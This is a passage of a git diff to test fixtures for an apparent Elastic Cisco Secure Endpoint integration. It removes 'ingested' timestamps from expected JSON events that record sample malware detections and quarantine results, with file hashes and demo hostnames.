Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532305\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -3824,7 +3780,6 @@ ], "code": "1090519054", "id": "6533667575396565000", - "ingested": "2022-02-02T05:52:33.422913153Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667575396565000,\"timestamp\":1610705572,\"timestamp_nanoseconds\":971000000,\"date\":\"2021-01-15T10:12:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667575396565008\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json index 4691e88d183..4230d2b11ae 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json @@ -44,7 +44,6 @@ ], "code": "553648147", "id": "6508397899087348000", - "ingested": "2022-02-02T05:52:43.212711526Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6508397899087348000,\"timestamp\":1610659036,\"timestamp_nanoseconds\":295927133,\"date\":\"2021-01-14T21:17:16+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.6A37D750F0-100.SBX.TG\",\"detection_id\":\"6508397899087347713\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "severity": 3 @@ -130,7 +129,6 @@ ], "code": "1107296272", "id": "14930696955218", - "ingested": "2022-02-02T05:52:43.212714468Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14930696955218,\"timestamp\":1610656706,\"timestamp_nanoseconds\":844899579,\"date\":\"2021-01-14T20:38:26+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610656706,\"start_date\":\"2021-01-14T20:38:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "severity": 3, @@ -212,7 +210,6 @@ ], "code": "2164260880", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212715451Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "severity": 2 @@ -288,7 +285,6 @@ ], "code": "2164260880", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212716286Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "severity": 2 @@ -366,7 +362,6 @@ ], "code": "1090519054", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212717142Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":7120,\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}}", "severity": 2 @@ -461,7 +456,6 @@ ], "code": "1090519054", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212718003Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "severity": 2 @@ -555,7 +549,6 @@ ], "code": "1090519054", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212718818Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":4788,\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "severity": 2 @@ -648,7 +641,6 @@ ], "code": "1090519054", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212719635Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":478000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "severity": 2 @@ -736,7 +728,6 @@ ], "code": "553648143", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212720443Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "severity": 2 @@ -808,7 +799,6 @@ ], "code": "553648143", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212721253Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "severity": 2 @@ -884,7 +874,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212722074Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", "severity": 2 @@ -960,7 +949,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212723139Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", "severity": 2 @@ -1036,7 +1024,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212723974Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1112,7 +1099,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212724884Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526294\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1188,7 +1174,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212725692Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526293\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1264,7 +1249,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212726576Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 